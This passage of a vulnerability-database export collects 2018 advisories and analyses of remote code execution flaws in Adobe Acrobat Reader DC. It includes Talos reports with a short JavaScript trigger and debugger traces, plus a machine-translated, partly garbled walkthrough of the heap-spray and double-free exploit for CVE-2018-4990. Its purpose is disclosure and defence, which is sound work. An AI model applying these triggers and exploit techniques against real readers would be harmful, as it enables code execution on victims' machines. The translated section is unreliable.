7763d6c7 EScript!mozilla::HashBytes+0x4aebd\r\n0016ca3c 774a5069 Annots!PlugInMain+0x1b97c6\r\n0016ca5c 774a4f71 Annots!PlugInMain+0x21168\r\n0016ca9c 7763d663 Annots!PlugInMain+0x21070\r\n0016cadc 774a5069 Annots!PlugInMain+0x1b9762\r\n0016cafc 7763d75e Annots!PlugInMain+0x21168\r\n0016cb2c 515db634 Annots!PlugInMain+0x1b985d\r\n```\r\n\r\n### Timeline\r\n* 2018-01-23 - Vendor Disclosure\r\n* 2018-05-15 - Public Release", "published": "2018-05-17T00:00:00", "type": "seebug", "title": "Adobe Acrobat Reader DC ANFancyAlertImpl Remote Code Execution Vulnerability(CVE-2018-4947)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4947"], "modified": "2018-05-17T00:00:00", "id": "SSV:97294", "href": "https://www.seebug.org/vuldb/ssvid-97294", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": ""}], "talosblog": [{"lastseen": "2018-05-15T21:13:57", "bulletinFamily": "blog", "cvelist": ["CVE-2018-4947", "CVE-2018-4996"], "description": "_Discovered by Aleksandar Nikolic of Cisco Talos_ \n \n_Update 05/15/18_: The CVE for TALOS-2018-0517 has been corrected below. \n\n\n## Overview\n\n \nToday, Talos is releasing details of a new vulnerabilities within Adobe Acrobat Reader DC. Adobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. \n \nA specific Javascript script embedded in a PDF file can cause the document ID field to be used in an unbounded copy operation leading to stack-based buffer overflow when opening a specially crafted PDF document in Adobe Acrobat Reader DC 2018.009.20044. This stack overflow can lead to return address overwrite which can result in arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page. \n \n\n\n### TALOS-2018-0517 - Adobe Acrobat Reader DC Net.Discovery.queryServices Remote Code Execution Vulnerability (CVE-2018-4996)\n\n \nA specific Javascript script embedded in a PDF file can lead to a pointer to previously freed object to be reused when opening a PDF document in Adobe Acrobat Reader DC 2018.009.20044. With careful memory manipulation, this can potentially lead to sensitive memory disclosure or arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page. Detailed vulnerability information can be found [here](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0517>). \n \n\n\n### TALOS-2018-0518 - Adobe Acrobat Reader DC ANFancyAlertImpl Remote Code Execution Vulnerability (CVE-2018-4947)\n\n \nA specific Javascript script embedded in a PDF file can lead to a pointer to previously freed object to be reused when opening a PDF document in Adobe Acrobat Reader DC 2018.009.20044. With careful memory manipulation, this can potentially lead to sensitive memory disclosure or arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page. Detailed vulnerability information can be found [here](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0518>). \n \n\n\n## Known vulnerable versions\n\n \nAdobe Acrobat Reader DC 2018.009.20044 \n \n\n\n## Coverage\n\n \nThe following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org. \n \nSnort Rules: 45506-45507, 45521-45522 \n \n\n\n[](<http://feeds.feedburner.com/~ff/feedburner/Talos?a=wlCWZuun2rs:EsJhBSnRcIM:yIl2AUoC8zA>)\n\n", "modified": "2018-05-15T20:38:52", "published": "2018-05-15T06:51:00", "id": "TALOSBLOG:C087C65FAEEB57D382F9DD6FD51D549C", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/wlCWZuun2rs/multiple-acrobat-reader-vulns.html", "type": "talosblog", "title": "Vulnerability Spotlight: Multiple Adobe Acrobat Reader DC Vulnerabilities", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-10T22:29:40", "bulletinFamily": "blog", "cvelist": ["CVE-2018-12756", "CVE-2018-12812", "CVE-2018-12815"], "description": "_Discovered by Aleksandar Nikolic of Cisco Talos_ \n\n\n### Overview\n\nToday, Talos is releasing details of new vulnerabilities within Adobe Acrobat Reader DC. Adobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger these vulnerabilities. \n\n\n### TALOS-2018-0569 - Adobe Acrobat Reader DC Collab.drivers Remote Code Execution Vulnerability (CVE-2018-12812)\n\n \n \nA specific JavaScript code embedded in a PDF file can lead to an object type confusion when opening a PDF document in Adobe Acrobat Reader DC 2018.011.20038. With careful memory manipulation, this can lead to arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page. Detailed vulnerability information can be found [here](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0569>). \n\n\n### TALOS-2018-0590 - Adobe Acrobat Reader DC Collab newWrStreamToCosObj Remote Code Execution Vulnerability (CVE-2018-12756)\n\nA specific JavaScript code embedded in a PDF file can lead to an object type confusion when opening a PDF document in Adobe Acrobat Reader DC 2018.011.20038. With careful memory manipulation, this can lead to arbitrary code execution. In order to trigger this vulnerability, victim would need to open the malicious file or access a malicious web page. Detailed vulnerability information can be found [here](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0590>). \n\n\n### TALOS-2018-0592 - Adobe Acrobat Reader DC JSON Stringify Remote Code Execution Vulnerability (CVE-2018-12815)\n\nA specific JavaScript code embedded in a PDF file can lead to a use-after-free condition when opening a PDF document in Adobe Acrobat Reader DC 2018.011.20038. With careful memory manipulation, this can lead to arbitrary code execution. In order to trigger this vulnerability, victim would need to open the malicious file or access a malicious web page. Detailed vulnerability information can be found [here](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0592>). \n \n\n\n#### Known vulnerable versions\n\nAdobe Acrobat Reader DC 2018.011.20038 \n \n\n\n[](<http://3.bp.blogspot.com/-_gx-CKXcM6s/W0UVE0O4z4I/AAAAAAAADNk/teef_5aO8I4kCho5FRErk5-UUdZIHCM9ACK4BGAYYCw/s1600/patch_availability_available.jpg>)\n\n### Coverage\n\nThe following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org. \n \nSnort Rules: 46292-46293, 46550-46551, 46634-46635 \n \n\n\n", "modified": "2018-07-10T20:20:40", "published": "2018-07-10T10:31:00", "id": "TALOSBLOG:E89C3607ED6143C88E65B06729E1F294", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/XPxo44xwpZM/vuln-spotlight-adobe-reader.html", "type": "talosblog", "title": "Vulnerability Spotlight: Multiple Adobe Acrobat DC Remote Code Execution Vulnerabilties", "cvss": {"score": 0.0, "vector": "NONE"}}], "myhack58": [{"lastseen": "2018-06-01T15:53:41", "bulletinFamily": "info", "cvelist": ["CVE-2018-4990", "CVE-2018-8120"], "description": "2018 5 on 15 September, ESET released the article\u201cA tale of two zero-days\u201d, the article disclosed this year 3 month ESET in malware scan engine VirusTotal on the capture of the one used to attack the test PDF document. The PDF document contains a sample of two pieces of 0-day Vulnerability, CVE-2018-4990, CVE-2018-8120 to achieve for Adobe Acrobat/Reader PDF reader arbitrary code execution. Which CVE-2018-4990 Adobe PDF reader code execution vulnerability, CVE-2018-8120 is the Windows operating system Win32k kernel mention the right vulnerability, in the obtain code execution permissions by the kernel to mention the right vulnerability to bypass Adobe PDF reader's sandbox protection, to achieve arbitrary code execution. \nVulnerability the use of backtracking analysis \n360 Threat Intelligence Center analysis confirmed that the disclosed vulnerabilities can be exploited, in this paper we tried to open the POC in the sample for the Adobe Acrobat/Reader code execution vulnerability, CVE-2018-4990 use of the process in detail analysis, and recording of the entire analysis process. As with the analysis of impropriety please understand. \nAnalysis of the environment \n[Operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>): Windows 7 SP1 \nAdobeReader DC: 1700920044 \nSamples MD5: the bd23ad33accef14684d42c32769092a0 \nPayload function parses \nUse PDFStream open vulnerability of the sample, in the tail can be found to Use JavaScript to trigger the use of the vulnerability: \n! [](/Article/UploadPic/2018-6/201861173548288. png? www. myhack58. com) \nThrough the analysis shows that the JavaScript in the front into PDF reader vulnerability is triggered after the load operation of the load, mainly used to provide the right and execute malicious code. And after the JavaScript code through the two Array instance sprayarr and a1 to achieve memory Spray layout, it should be noted that a1 is the Array in the odd-subscript of the element were released, this is the UAF class exploits a common memory layout techniques: a \n! [](/Article/UploadPic/2018-6/201861173548377. png? www. myhack58. com) \nMemory deployment is successful, then in myfun1 and myfun2 called twice to trigger a double free of the script, the script code to trigger a double free, which leads to subsequent code is executed, trigger a double free of the script: \nvarf1 = this. getField(\"Button1\"); \nFinally, the array instance sprayarr2 assignment, each element is a length of 0\u00d720000-0\u00d724 ArrayBuffer, and then traverse the sprayarr can be found which corresponds to a sprayarr the element length is modified to 0\u00d720000-0\u00d724 the default length is 0\u00d710000-0\u00d724\uff09, this time through ultra-long sprayarr[i1]can be modified adjacent the sprayarr[i1+1]object len length of the attribute, from which script code can be seen in length is modified to 0\u00d766666666, and ultimately through the long sprayarr[i1+1]can achieve full memory read and write: a \n! [](/Article/UploadPic/2018-6/201861173548237. png? www. myhack58. com) \nFor this the attacker has prepared a special use of ultra-long sprayarr the object to achieve full memory read and write function: \n! [](/Article/UploadPic/2018-6/201861173548144. png? www. myhack58. com) \nTo obtain a full memory reading and writing, the POC, through forged bookmarkRoot object to achieve code execution: \n! [](/Article/UploadPic/2018-6/201861173549831. png? www. myhack58. com) \nPOC running the following will cause the crash: \n! [](/Article/UploadPic/2018-6/201861173549562. png? www. myhack58. com) \nCollapse of the reasons for the objecscript address is hard-coded, wherein the 0x23A59BA4-0\u00d723800000 address is not adapted to test the Adobe Reader version, causing the crash: \n! [](/Article/UploadPic/2018-6/201861173549851. png? www. myhack58. com) \nThrough the POC Payload function analysis, we have identified a POC in a few need to analyze the main points, it is also figuring out the whole exploit key: \nl sprayarr, a1 in the memory spray memory structure \nl trigger the double free of code specific analysis var f1 = this. getField(\"Button1\");\uff09 \nl sprayarr2 initialization of the memory state, the initial of each element length is just sprayarr super long element length, this lets us suspect that sprayarr2 and a sprayarr coincide, perhaps a second point code in the sprayarr a element release? Then sprayarr2 reuse it?\uff09 \nScript analysis and debug \nWith a Payload function analysis derived the exploits of the key points we began one by one for debugging analysis. \nHow to analyze the associated memory structure \nSample specific vulnerability trigger/use parts are the JavaScript, and therefore to debug when we can rely on the corresponding trigonometric function to achieve a specific interrupt. In order to obtain the corresponding memory structure, we can directly modify the corresponding POC, such as POC, create an Array of instances of myContent, the Array in the 0th element assigned the value of 0x1a2c3d4f, in order to facilitate memory search, respectively, after the We are interested in variable assign a value to the Array can be easily positioned memory for analysis: \n! [](/Article/UploadPic/2018-6/201861173549861. png? www. myhack58. com) \nBy the above-described trigonometric function off, this time by the search 0x1a2c3d4f can be found in the corresponding myContent structure, as shown in the address 0x062035f8 the start of the data for the corresponding tag for 0x1a2c3d4f, after the four-byte value 0xffffff81 mark the element of the type type, and then the next turn we assigned the value of the element, as are the Array, so the type are 0xffffff87: the \n! [](/Article/UploadPic/2018-6/201861173549846. png? www. myhack58. com)\n\n**[1] [[2]](<90341_2.htm>) [[3]](<90341_3.htm>) [[4]](<90341_4.htm>) [[5]](<90341_5.htm>) [next](<90341_2.htm>)**\n", "edition": 1, "modified": "2018-06-01T00:00:00", "published": "2018-06-01T00:00:00", "id": "MYHACK58:62201890341", "href": "http://www.myhack58.com/Article/html/3/62/2018/90341.htm", "title": "CVE-2018-4990 Adobe Reader code execution exploit analysis-exploit warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}], "talos": [{"lastseen": "2020-07-01T21:25:07", "bulletinFamily": "info", "cvelist": ["CVE-2018-12812"], "description": "# Talos Vulnerability Report\n\n### TALOS-2018-0569\n\n## Adobe Acrobat Reader DC Collab.drivers Remote Code Execution Vulnerability\n\n##### July 10, 2018\n\n##### CVE Number\n\nCVE-2018-12812\n\n### Summary\n\nA specific JavaScript code embedded in a PDF file can lead to an object type confusion when opening a PDF document in Adobe Acrobat Reader DC 2018.011.20038. With careful memory manipulation, this can lead to arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.\n\n### Tested Versions\n\nAdobe Acrobat Reader DC 2018.011.20038\n\n### Product URLs\n\n<https://get.adobe.com/reader/>\n\n### CVSSv3 Score\n\n6.8 - CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-843: Access of Resource Using Incompatible Type (\u2018Type Confusion\u2019)\n\n### Details\n\nAdobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a large user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. The one method call required to trigger this vulnerability is privileged, and can only be called from trusted functions or from a trusted location.\n\nAdobe Acrobat Reader DC supports embedded JavaScript code in the PDF to allow for interactive PDF forms. This give the potential attacker the ability to precisely control memory layout, and poses an additional attack surface.\n\nWhile executing the following piece of JavaScript code, a specific condition leading to an object of wrong type being misinterpreted can cause memory corruption (it should be noted that all three of these lines require higher privileges, meaning they must be executed in a trusted PDF file):\n \n \n this.event = this.Collab.drivers[0]; \n this.InitializeFormsTrackerJS( );\n this.Collab.drivers[0].getWorkspaceCreator(null, this); \n \n\nAfter calling `InitializeFormsTrackerJS`, which is an undocumented JavaScript function, a subsequent dereference of `this.Collab.drivers[0]` with a call to a particular method will cause one extra object of wrong type to be accessed. After a call to `getWorkspaceCreator`, in the debugger, we actually end up in the following code:\n \n \n Breakpoint 0 hit\n eax=17dd3000 ebx=00000000 ecx=59c715e4 edx=59c715e4 esi=24cdf000 edi=36dbf000\n eip=5779757c esp=0023c754 ebp=0023c77c iopl=0 nv up ei pl nz na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206\n Annots!PlugInMain+0x7367b:\n 5779757c ff90cc000000 call dword ptr [eax+0CCh] ds:0023:17dd30cc=57f27398\n 0:000> k\n # ChildEBP RetAddr \n WARNING: Stack unwind information not available. Following frames may be wrong.\n 00 0023c77c 59b0d6ca Annots!PlugInMain+0x7367b\n 01 0023c7ec 59b11c50 EScript!mozilla::HashBytes+0x2d054\n 02 0023c81c 59ae388f EScript!mozilla::HashBytes+0x315da\n 03 0023c8ac 59ae32f3 EScript!mozilla::HashBytes+0x3219\n 04 0023c8c8 59b0d235 EScript!mozilla::HashBytes+0x2c7d\n 05 0023c914 59b0d1c8 EScript!mozilla::HashBytes+0x2cbbf\n 06 0023c930 59b11a59 EScript!mozilla::HashBytes+0x2cb52\n 07 0023c94c 59b119f0 EScript!mozilla::HashBytes+0x313e3\n 08 0023c97c 59b2b605 EScript!mozilla::HashBytes+0x3137a\n 09 0023c9d0 59b2b505 EScript!mozilla::HashBytes+0x4af8f\n 0a 0023c9e8 578dd779 EScript!mozilla::HashBytes+0x4ae8f\n 0b 0023ca28 5774506e Annots!PlugInMain+0x1b9878\n 0c 0023ca48 57744f76 Annots!PlugInMain+0x2116d\n 0d 0023ca88 578dd715 Annots!PlugInMain+0x21075\n 0e 0023cac8 5774506e Annots!PlugInMain+0x1b9814\n 0f 0023cae8 578dd7b9 Annots!PlugInMain+0x2116d\n 10 0023cb00 59b2b61a Annots!PlugInMain+0x1b98b8\n 11 0023cb50 59b2b505 EScript!mozilla::HashBytes+0x4afa4\n 12 0023cb68 578dd779 EScript!mozilla::HashBytes+0x4ae8f\n \n\nAt this call, EScript\u2019s cachehash will be consulted, and an object returned as a result. Because things don\u2019t change over many calls of the above code, we can get the resulting pointer in advance:\n \n \n 0:000> dd poi(poi(poi(poi(esp)+0x10)+0x34)+4)\n 33046000 57b38810 00000000 337fd000 ffffffff\n 33046010 33803000 ffffffff 00000000 57b3908c\n 33046020 00000000 57b08984 00000000 57b39148\n 33046030 00000000 337f1000 ffffffff 00000000\n 33046040 00000000 00000000 00000000 00000000\n 33046050 00000000 00000000 00000000 00000000\n 33046060 00000000 00000000 00000000 00000000\n 33046070 57b0877c 00000000 00000000 00000000\n \n\nAnd indeed, if we wait for the above call to return, we see the same result in the `eax`:\n \n \n 0:000> p\n eax=33046000 ebx=00000000 ecx=57b0a370 edx=57b0a378 esi=24cdf000 edi=36dbf000\n eip=57797582 esp=0023c754 ebp=0023c77c iopl=0 nv up ei pl nz na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206\n Annots!PlugInMain+0x73681:\n 57797582 59 pop ecx\n 0:000> dd eax\n 33046000 57b38810 00000000 337fd000 ffffffff\n 33046010 33803000 ffffffff 00000000 57b3908c\n 33046020 00000000 57b08984 00000000 57b39148\n 33046030 00000000 337f1000 ffffffff 00000000\n 33046040 00000000 00000000 00000000 00000000\n 33046050 00000000 00000000 00000000 00000000\n 33046060 00000000 00000000 00000000 00000000\n 33046070 57b0877c 00000000 00000000 00000000\n \n\nLooking up heap information of this pointer reveals the following:\n \n \n 0:000> !heap -p -a 33046000 \n address 33046000 found in\n _DPH_HEAP_ROOT @ 1241000\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\n 331b064c: 33046000 108 - 33045000 2000\n ? Annots!PlugInMain+41490f\n 66818e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\n 77756206 ntdll!RtlDebugAllocateHeap+0x00000030\n 7771a127 ntdll!RtlpAllocateHeap+0x000000c4\n 776e5950 ntdll!RtlAllocateHeap+0x0000023a\n 5cdced43 MSVCR120!malloc+0x00000049 [f:\\dd\\vctools\\crt\\crtw32\\heap\\malloc.c @ 92]\n 57728b12 Annots!PlugInMain+0x00004c11\n 57728ac1 Annots!PlugInMain+0x00004bc0\n 577441c7 Annots!PlugInMain+0x000202c6\n 57744170 Annots!PlugInMain+0x0002026f\n 59b225d3 EScript!mozilla::HashBytes+0x00041f5d\n 59b075ce EScript!mozilla::HashBytes+0x00026f58\n 59b017da EScript!mozilla::HashBytes+0x00021164\n 59b00606 EScript!mozilla::HashBytes+0x0001ff90\n 59b00511 EScript!mozilla::HashBytes+0x0001fe9b\n 59b00458 EScript!mozilla::HashBytes+0x0001fde2\n 59ae9e2e EScript!mozilla::HashBytes+0x000097b8\n 59b285ec EScript!mozilla::HashBytes+0x00047f76\n 59b28370 EScript!mozilla::HashBytes+0x00047cfa\n 59b27de3 EScript!mozilla::HashBytes+0x0004776d\n 59b26cd5 EScript!mozilla::HashBytes+0x0004665f\n 59b96428 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f743\n 584dcb1e AcroRd32!AIDE::PixelPartInfo::operator=+0x000222ce\n 584d922c AcroRd32!AIDE::PixelPartInfo::operator=+0x0001e9dc\n 5832efca AcroRd32!AX_PDXlateToHostEx+0x0015a229\n 5832f4c8 AcroRd32!AX_PDXlateToHostEx+0x0015a727\n 584dc87b AcroRd32!AIDE::PixelPartInfo::operator=+0x0002202b\n 57fc5293 AcroRd32!PDAlternatesGetCosObj+0x0001ce03\n 57f8cb36 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000bac25\n 57f040bc AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000321ab\n 57f031ad AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003129c\n 57ee7a07 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00015af6\n 57ee6fbb AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000150aa\n \n\nNote that it\u2019s an object of size 0x108. In the sample proof of concept there are total of 12 benign calls on the above break point, all returning an object of size 0x108 as a result. But, 13th call (which is a result of calling `InitializeFormsTrackerJS`) will be erroneous:\n \n \n eax=17dd3000 ebx=00000000 ecx=59c715e4 edx=59c715e4 esi=24cdf000 edi=332b7000\n eip=5779757c esp=0023c8d4 ebp=0023c8fc iopl=0 nv up ei pl nz na po nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202\n Annots!PlugInMain+0x7367b:\n 5779757c ff90cc000000 call dword ptr [eax+0CCh] ds:0023:17dd30cc=57f27398\n 0:000> k\n # ChildEBP RetAddr \n WARNING: Stack unwind information not available. Following frames may be wrong.\n 00 0023c8fc 59b0d6ca Annots!PlugInMain+0x7367b\n 01 0023c96c 59b11c50 EScript!mozilla::HashBytes+0x2d054\n 02 0023c99c 59ae388f EScript!mozilla::HashBytes+0x315da\n 03 0023ca2c 59ae32f3 EScript!mozilla::HashBytes+0x3219\n 04 0023ca48 59b0d235 EScript!mozilla::HashBytes+0x2c7d\n 05 0023ca94 59b0d1c8 EScript!mozilla::HashBytes+0x2cbbf\n 06 0023cab0 59b11a59 EScript!mozilla::HashBytes+0x2cb52\n 07 0023cacc 59b119f0 EScript!mozilla::HashBytes+0x313e3\n 08 0023cafc 59b2b605 EScript!mozilla::HashBytes+0x3137a\n 09 0023cb50 59b2b505 EScript!mozilla::HashBytes+0x4af8f\n 0a 0023cb68 578dd779 EScript!mozilla::HashBytes+0x4ae8f\n 0b 0023cba8 5774506e Annots!PlugInMain+0x1b9878\n 0c 0023cbc8 578dd7b9 Annots!PlugInMain+0x2116d\n 0d 0023cbe0 59b2b61a Annots!PlugInMain+0x1b98b8\n 0e 0023cc30 59b2b505 EScript!mozilla::HashBytes+0x4afa4\n 0f 0023cc48 578dd779 EScript!mozilla::HashBytes+0x4ae8f\n 10 0023cc88 5774506e Annots!PlugInMain+0x1b9878\n 11 0023cca8 57744f76 Annots!PlugInMain+0x2116d\n 12 0023cce8 577958db Annots!PlugInMain+0x21075\n 13 0023cda8 59b225d3 Annots!PlugInMain+0x719da\n 14 0023ce20 59b075ce EScript!mozilla::HashBytes+0x41f5d\n 15 0023ce94 59b017da EScript!mozilla::HashBytes+0x26f58\n 16 0023d3ec 59b00606 EScript!mozilla::HashBytes+0x21164\n 17 0023d424 59b00511 EScript!mozilla::HashBytes+0x1ff90\n 18 0023d460 59b00458 EScript!mozilla::HashBytes+0x1fe9b\n 19 0023d490 59ae9e2e EScript!mozilla::HashBytes+0x1fde2\n 0:000> dd poi(poi(poi(poi(esp)+0x10)+0x34)+4)\n 2c2fb000 33b93000 00000000 33b93000 d0d0d0d0\n 2c2fb010 334e5000 00000000 00000003 d0d0d0d0\n 2c2fb020 00690074 006e006f d0d00000 d0d0d0d0\n 2c2fb030 72656b63 00000000 c0c0c0c0 c0c0c0c0\n 2c2fb040 00000000 00000000 00000000 00000000\n 2c2fb050 00000000 00000000 00000000 00000000\n 2c2fb060 00000000 00000000 00000000 00000000\n 2c2fb070 00000000 00000000 00000000 00000000\n 0:000> !heap -p -a poi(poi(poi(poi(esp)+0x10)+0x34)+4)\n address 2c2fb000 found in\n _DPH_HEAP_ROOT @ 1241000\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\n 2c1b3e04: 2c2fb000 8 - 2c2fa000 2000\n 66818e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\n 77756206 ntdll!RtlDebugAllocateHeap+0x00000030\n 7771a127 ntdll!RtlpAllocateHeap+0x000000c4\n 776e5950 ntdll!RtlAllocateHeap+0x0000023a\n 5cdced43 MSVCR120!malloc+0x00000049 [f:\\dd\\vctools\\crt\\crtw32\\heap\\malloc.c @ 92]\n 5cdcee1c MSVCR120!operator new+0x0000001d [f:\\dd\\vctools\\crt\\crtw32\\heap\\new.cpp @ 59]\n 5772dff6 Annots!PlugInMain+0x0000a0f5\n 5772daf9 Annots!PlugInMain+0x00009bf8\n 577290b0 Annots!PlugInMain+0x000051af\n 57737e59 Annots!PlugInMain+0x00013f58\n 5774506e Annots!PlugInMain+0x0002116d\n 578dd7b9 Annots!PlugInMain+0x001b98b8\n 59b2b61a EScript!mozilla::HashBytes+0x0004afa4\n 59b2b505 EScript!mozilla::HashBytes+0x0004ae8f\n 578dd779 Annots!PlugInMain+0x001b9878\n 5774506e Annots!PlugInMain+0x0002116d\n 57744f76 Annots!PlugInMain+0x00021075\n 577958db Annots!PlugInMain+0x000719da\n 59b225d3 EScript!mozilla::HashBytes+0x00041f5d\n 59b075ce EScript!mozilla::HashBytes+0x00026f58\n 59b017da EScript!mozilla::HashBytes+0x00021164\n 59b00606 EScript!mozilla::HashBytes+0x0001ff90\n 59b00511 EScript!mozilla::HashBytes+0x0001fe9b\n 59b00458 EScript!mozilla::HashBytes+0x0001fde2\n 59ae9e2e EScript!mozilla::HashBytes+0x000097b8\n 59b285ec EScript!mozilla::HashBytes+0x00047f76\n 59b28370 EScript!mozilla::HashBytes+0x00047cfa\n 59b27de3 EScript!mozilla::HashBytes+0x0004776d\n 59b26cd5 EScript!mozilla::HashBytes+0x0004665f\n 59b96428 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f743\n 584dcb1e AcroRd32!AIDE::PixelPartInfo::operator=+0x000222ce\n 584d922c AcroRd32!AIDE::PixelPartInfo::operator=+0x0001e9dc\n \n\nIn the above debugging output we can see, even before the call is made, that the returned object pointer will point to an object of size 8 in this case (note that this is with full page heap enabled and the details might vary with memory layout). And indeed, after returning from this call, we have a wrong object in `eax`:\n \n \n 0:000> p\n eax=2c2fb000 ebx=00000000 ecx=57b0a370 edx=57b0a378 esi=24cdf000 edi=332b7000\n eip=57797582 esp=0023c8d4 ebp=0023c8fc iopl=0 nv up ei pl nz na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206\n Annots!PlugInMain+0x73681:\n 57797582 59 pop ecx\n 0:000> dd eax\n 2c2fb000 33b93000 00000000 33b93000 d0d0d0d0\n 2c2fb010 334e5000 00000000 00000003 d0d0d0d0\n 2c2fb020 00690074 006e006f d0d00000 d0d0d0d0\n 2c2fb030 72656b63 00000000 c0c0c0c0 c0c0c0c0\n 2c2fb040 00000000 00000000 00000000 00000000\n 2c2fb050 00000000 00000000 00000000 00000000\n 2c2fb060 00000000 00000000 00000000 00000000\n 2c2fb070 00000000 00000000 00000000 00000000\n \n\nThis brings us to the consequence of this type confusion. Listing the immediately following code reveals the problem:\n \n \n 57797582 59 pop ecx\n 57797583 59 pop ecx\n 57797584 85c0 test eax,eax\n 57797586 743d je Annots!PlugInMain+0x736c4 (577975c5)\n 57797588 8b10 mov edx,dword ptr [eax]\n 5779758a 8d4df0 lea ecx,[ebp-10h]\n 5779758d 51 push ecx\n 5779758e 8bc8 mov ecx,eax\n 57797590 ff521c call dword ptr [edx+1Ch]\n \n\nIf `eax` isn\u2019t null, a pointer value is read into `edx` and is subsequently dereferenced in a `call` instruction. Because `eax` now points to a wrong object type, this can possibly result in control flow hijacking and arbitrary code execution. Indeed, continuing the execution leads to a crash due to the instruction pointer pointing to an invalid location.\n\n### Crash Information\n\nCrash with full page heap enabled:\n \n \n 0:000> g\n (143c.12e0): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n eax=2c2fb000 ebx=00000000 ecx=2c2fb000 edx=33b93000 esi=24cdf000 edi=332b7000\n eip=c0c0c0c0 esp=0023c8d4 ebp=0023c8fc iopl=0 nv up ei pl nz na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\n c0c0c0c0 ?? ???\n 0:000> k\n # ChildEBP RetAddr \n WARNING: Frame IP not in any known module. Following frames may be wrong.\n 00 0023c8d0 57797593 0xc0c0c0c0\n 01 0023c8fc 59b0d6ca Annots!PlugInMain+0x73692\n 02 0023c96c 59b11c50 EScript!mozilla::HashBytes+0x2d054\n 03 0023c99c 59ae388f EScript!mozilla::HashBytes+0x315da\n 04 0023ca2c 59ae32f3 EScript!mozilla::HashBytes+0x3219\n 05 0023ca48 59b0d235 EScript!mozilla::HashBytes+0x2c7d\n 06 0023ca94 59b0d1c8 EScript!mozilla::HashBytes+0x2cbbf\n 07 0023cab0 59b11a59 EScript!mozilla::HashBytes+0x2cb52\n 08 0023cacc 59b119f0 EScript!mozilla::HashBytes+0x313e3\n 09 0023cafc 59b2b605 EScript!mozilla::HashBytes+0x3137a\n 0a 0023cb50 59b2b505 EScript!mozilla::HashBytes+0x4af8f\n 0b 0023cb68 578dd779 EScript!mozilla::HashBytes+0x4ae8f\n 0c 0023cba8 5774506e Annots!PlugInMain+0x1b9878\n 0d 0023cbc8 578dd7b9 Annots!PlugInMain+0x2116d\n 0e 0023cbe0 59b2b61a Annots!PlugInMain+0x1b98b8\n 0f 0023cc30 59b2b505 EScript!mozilla::HashBytes+0x4afa4\n 10 0023cc48 578dd779 EScript!mozilla::HashBytes+0x4ae8f\n 11 0023cc88 5774506e Annots!PlugInMain+0x1b9878\n 12 0023cca8 57744f76 Annots!PlugInMain+0x2116d\n 13 0023cce8 577958db Annots!PlugInMain+0x21075\n 14 0023cda8 59b225d3 Annots!PlugInMain+0x719da\n 15 0023ce20 59b075ce EScript!mozilla::HashBytes+0x41f5d\n 0:000> dd eax\n 2c2fb000 33b93000 00000000 33b93000 d0d0d0d0\n 2c2fb010 334e5000 00000000 00000003 d0d0d0d0\n 2c2fb020 00690074 006e006f d0d00000 d0d0d0d0\n 2c2fb030 72656b63 00000000 c0c0c0c0 c0c0c0c0\n 2c2fb040 00000000 00000000 00000000 00000000\n 2c2fb050 00000000 00000000 00000000 00000000\n 2c2fb060 00000000 00000000 00000000 00000000\n 2c2fb070 00000000 00000000 00000000 00000000\n 0:000> !heap -p -a eax\n address 2c2fb000 found in\n _DPH_HEAP_ROOT @ 1241000\n in busy allocation ( DPH_HEAP_BLOCK: 